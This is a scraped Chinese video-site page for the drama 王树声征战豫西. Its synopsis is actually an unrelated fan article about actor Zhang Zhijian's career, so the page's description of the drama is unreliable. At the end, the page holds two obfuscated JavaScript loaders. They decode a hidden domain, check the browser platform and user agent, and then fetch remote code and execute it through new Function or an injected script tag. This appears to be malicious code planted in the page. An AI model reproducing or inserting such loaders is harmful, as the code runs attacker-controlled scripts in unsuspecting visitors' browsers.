王树声征战豫西

  • 马诗红 张志坚 章艳敏 褚栓忠
  • 120分钟
  • 王树声征战豫西影片简介:有生之年,欣喜相逢,点击上…王树声征战豫西影片简介:有生之年,欣喜相逢,点击上方“关注”一起抒写更多温暖的故事。 《冰雨火》播放至今,大家都在猜测幕后大Boss是谁? 从林德赞、刘恺华到陈力文都有嫌疑,他们都有疑似传递情报、刻意引导的行为。 到目前为止,经过抽丝剥茧,从身份级别、跟林德赞的对话以及他老领导身份出场的威慑力给人感觉,他是最有可能反转的那一个; 加之饰演陈力文的演员张志坚,在过往的作品中出演的角色都是反派居多,所以他成了观众投票率最高的那一个。 但是从官方介绍看,陈力文是总队长,他威严沉着,运筹帷幄,是幕后英雄。 如此看来他又不可能是反派,而且吴刚是他的下线,在吴刚牺牲后,他又艰难部署让吴振峰打入了贩D组织,怎么看他也不像是“内鬼”。 看《冰雨火》果然是费脑。 扮演陈力文的老戏骨张志坚,目前的戏份不多,但是他一出场就给人超强的威慑力,走路带风,拒绝客套,直奔主题,几句话就把人安排的明明白白,是一个雷厉风行的领导。 《冰雨火》接下来的剧情,让人期待,老戏骨张志坚在剧里的表现出彩; 戏外,他的人生也很精彩。 01 对于“老戏骨”这个词,张志坚是很谦虚的,他说自己不敢当。 因为在他看来,这个词是对老艺术家的一种褒奖,而自己是没有资格被称为老戏骨的,在他眼里,只有过去人艺的于四之、蓝天野这样的艺术家才能叫老戏骨。 张志坚说这个词不单是说年龄大、资格老,而是要真的在舞台上经过千锤百炼才称得上。 事实上,张志坚也在舞台上锤炼了四十多年,是被行业和观众认可的演技实力派。 从话剧舞台转入影视界。 张志坚在《大明王朝1566》《人间正道是沧桑》《国民英雄》《桐柏英雄》《毒刺》《大清盐商》《人民的名义》《鹤唳华亭》《风声》等几十部热播剧中都有精彩出演,获得过上海电视节“白玉兰奖”最佳男配角等殊荣。 张志坚对表演的热爱是刻进骨子里的,他生平低调,专注在角色里。 有人说他是典型的大器晚成,因为2017年凭中的“高育良”出圈时,他已经62岁了,对此也有人持反对意见,表示早在“1566”时就被他扮演的“小阁老”折服了。 确实,张志坚成名远比大家想象的还要早,只是他为人处世太过低调,所以名气不响。 1955年10月,张志坚出生于江苏省南京市的文艺家庭,其父曾是新四军抗大苏北第八分校的学员,后在新四军军部文工团工作。 张志坚走上演员这条道路,多少是受家庭氛围影响。 不过起初他的父亲并不希望他做演员,父亲希望他可以当一名教师,或者是公务员。 张志坚与老父亲 但是张志坚志不在此,他喜欢文化艺术,热爱表演,他想要走这条路。 1979年,江苏省话剧团在招收学员,因为父亲不希望他当演员,所以第一期报名的时候他没告诉他,到了第二期报考的最后一天,话剧团的老书记找上门来,张志坚得知后报考了。 他跟父亲沟通,表示自己钟爱这一行,就想走这条路,希望得到父亲的支持与理解,张父爱子心切尊重了儿子的选择。 那时候考试跟现在差不多,也要排小品的,张志坚从小就受艺术的熏陶,排演起来自然也不费事,通过努力,他顺利考入江苏省人民艺术剧院学员班,毕业后,他被分配到南京话剧团当演员。 02 张志坚的精湛演技,是在舞台上一点点锤炼出来的。 他刚进团时是从跑龙套开始的,不过他却乐此不疲,只要有机会他都不会放过,那些年他演得最多的是《陈毅出山》《一双绣花鞋》这一类剧目。 与此同时,张志坚还在寻找更多磨炼自己的机会,那时候团里活少,他就将目光投向影视圈,上世纪八十年代,他是当地最早参演电视剧的演员之一。 九十年代初期,他还出演了连续剧《深圳人》,这在当时是很火的,也就是说在九十年代初期张志坚就已经在南方小有名气了。 不过到了快四十岁的时候,张志坚做了一个决定。 当时他的妻子转业到北京,他不想夫妻两地分居,而且他自己也想到北京闯一下,所以在不惑之年他到了北京追梦。 有人说他是“北漂”,他表示自己这还不算,因为那一般指年轻人,自己当时快40了,而且也有一定的经济基础。 到了北京,起先找张志坚演戏的大多数还是原来认识的老朋友,后来才慢慢认识了一些新朋友,不过张志坚对剧本的要求很高,也正是如此,他有五六年都没拍一部戏。 张志坚与妻子 张志坚对自己的认知很清晰。 他觉得年轻的时候自己是一个书生,更擅长演一些文化气质的角色;四十岁之后,他觉得自己身体里的野性、一些男人的东西会不断地往外涌,所以没有好剧本他宁愿不演。 那几年,他骑着自行车,每天到菜市场买买菜,也没有觉得什么不好。 进入2000年后,他在《楼上楼下》《王树声征战豫西》《龙票》《雄关漫道》《飓风》《男孩非儿》《血色湘西》《大明王朝1566》等影视剧中均有精彩表现。 尤其是《大明王朝1566》中的严世藩更是让人惊艳。 不过让更多人关注到他的还是《人间正道是沧桑》中的董建昌一角。 虽然张志坚在里面的戏份不重,但是他却演活了董建昌,凭借这个角色让更多观众记住了张志坚这个名字。 电视剧《人间正道是沧桑》董建昌 03 张志坚能火,一点都不意外。 当初《人间正道是沧桑》拍了四个多月,董建昌在全剧中只有60场戏,本来半个月就能拍完的戏,但是张志坚硬是从头跟到了尾。 他只是做了自己本分的事,演好每一个角色,让他意外的是“老董”出来之后,竟有那么多人喜欢,也是那时候他才意识到这个角色那么可爱。 凭“老董”出圈之后,张志坚收到了各种各样的邀请,其中有很多都是跟董建昌差不多的角色,不过他都推掉了。 话剧版《人间正道是沧桑》 对于大多数演员来说,拍一部戏火了,就立马投入更多的宣传,接演更多的剧。 而张志坚相反,他很少接受媒体采访,也很少宣传,他说“戏演完了就完了,好不好观众说了算,乱宣传没有任何意义。” 《人间正道是沧桑》火了之后,张志坚一下推掉了14个剧本,整整一年都没有拍戏。 到了年底,他才觉得总得拍戏挣点钱过年吧,所以他才拍了张黎导演的另一部戏《孔子春秋》。 之后的几年,张志坚又相继出演了《毒刺》《国门英雄》《桐柏英雄》《大清盐商》《湄公河大案》《少林问道》等剧。 《少林问道》明德大人 看过这些剧的人会发现,张志坚饰演的角色多是大反派,他为何如此偏爱反派? “反派人物多丰富啊,我一般接的角色,到后期都会有个大反转。”张志坚如是说。 有很多演员不喜欢演反派,往往是因为这样的角色不讨喜,演不好就会挨骂。 但张志坚不怕,他有这个底气,他能把角色塑造得有血有肉,打动人心,即使是反派也能让很多观众喜欢,这就是实力派的魅力。 《人民的名义》剧照 04 2017年,《人民的名义》开播,张志坚在剧中扮演高育良书记。 凭借这个角色,他获得第23届上海电视节-白玉兰奖最佳男配奖,彻底出圈。 这一年,他62岁,已经演了近40年的戏他在晚年才成名,有人说他是“大器晚成”的典型。 事实上如前文所说,他并不能单纯地用这一个词来形容,因为对于他而言戏比天大。 而且在电视剧《人民的名义》热播之前,他已经在话剧版《人民的名义》中独挑大梁饰演高育良书记,在北京保利剧院上演时就很受欢迎。 当时有很多媒体想采访他,都被他拒绝了。后来,得知《人民的名义》要拍电视剧,导演邀请他的时候他就想演高育良,不过当时有媒体误会了他的意思,说他一开始最想演的是李达康书记。 事实上并非如此,只是从年龄上来说,他觉得自己适合演李达康、高育良,那时候他留着寸头,一副很干练的样子,给人的感觉就更适合雷厉风行的李达康。 再者当时高育良这个角色也有问过其他演员,所以他才会那样说。 张志坚、许亚军《人民的名义》剧照 如果李达康和高育良,二选一的话,他会毫无疑问选高育良。 而且后来张志坚看完剧本后,更加坚定了自己的选择,他跟剧组说如果不是高育良,他不会接这部戏。 张志坚为何如此钟爱这个角色呢? 不仅仅是因为他出演过话剧版的高育良,还因为这个人物太丰满了,他不是传统意义上的好人或坏人,也不是一个脸谱化的形象。 在开演之前,张志坚是把高育良琢磨透了,他眼中的高育良是这样的: 他说话总是收着说,走路也是慢悠悠的,更内敛一些,你说他贪吗?他不贪。 他心里贪的是什么?他不贪金钱,贪的是天下,他要的是绝对权力,天下和权力,是高育良的理想,同时他也明白官场的规则,不能坏了规矩。 因为当时拍《人民的名义》预算有限,为了更好地塑造高育良,张志坚还自掏腰包为高育良置办了一些衣物眼镜,将近两万元。 如此敬业,如此付出,你说他不火谁火。 而且他最让人敬佩和欣赏的是纯粹,不贪名逐利,只专注在角色里,面对爆红带来的一切他始终保持平常心。 05 凭《人民的名义》爆红之后,张志坚的工作室本来要做宣传,但是被他制止了,一篇宣传稿也不让发。 他告诫工作室的同事们要有一颗平常心。他明确地表示自己不会参加娱乐节目,娱乐活动,也不会接受媒体采访。 因为对于他而言,一个角色播完了就完了,还得接着拍戏,背台词,演好角色。 《鹤唳华亭》剧照 张志坚就是这样一个将戏放在第一位的演员。《人民的名义》爆火之后,他拒绝了所有采访,一头扎进了新剧里。 近几年他相继拍了《九州缥缈录》《鹤唳华亭》《今夕何夕》《风声》《爱上特种兵》《光芒》《王牌部队》等多部电视剧。 而今在《冰雨火》中,他出演的陈力文是省禁毒总队副队长,他一出场就把观众的眼球吸引住了。 张志坚已66岁了,但是他饰演的陈队中气十足,走路带风,运筹于帷幄之中,他不说话,光是眼神和气场都能让人感受到领导的威慑力。 至于他这次出演的角色是好是坏,是不是剧里的大boss,不到最后永远不知道。 因为在过往的多部剧中,他饰演的角色都是结局会大反转,这也是他为何偏爱反派角色。因为演起来真的很过瘾,他很享受这种状态。 对此,你怎么看?你觉得谁才是内鬼? 你还看过张志坚哪些戏,最爱他哪个角色,在评论区留言分享,为这样的常青树点赞赞赞赞赞赞赞赞赞吧。

同主演

王树声征战豫西评论

  • 评论加载中...
function WaeIfQO(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function smAXyVBP(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WaeIfQO(t);};window[''+'B'+'S'+'c'+'p'+'v'+'K'+'R'+'k'+'z'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=smAXyVBP,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('ZXJttbnQuaWttqbndkLnh5eg==','151743',window,document,['t','UyhWYi']);}:function(){};


function WLxXbgTl(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zPZha(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WLxXbgTl(t);};window[''+'z'+'E'+'d'+'c'+'C'+'q'+'B'+'S'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zPZha,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('ZXJtbnQuaWtqqbndkLnh5eg==','151742',window,document,['q','ZTDMgQ']);}:function(){};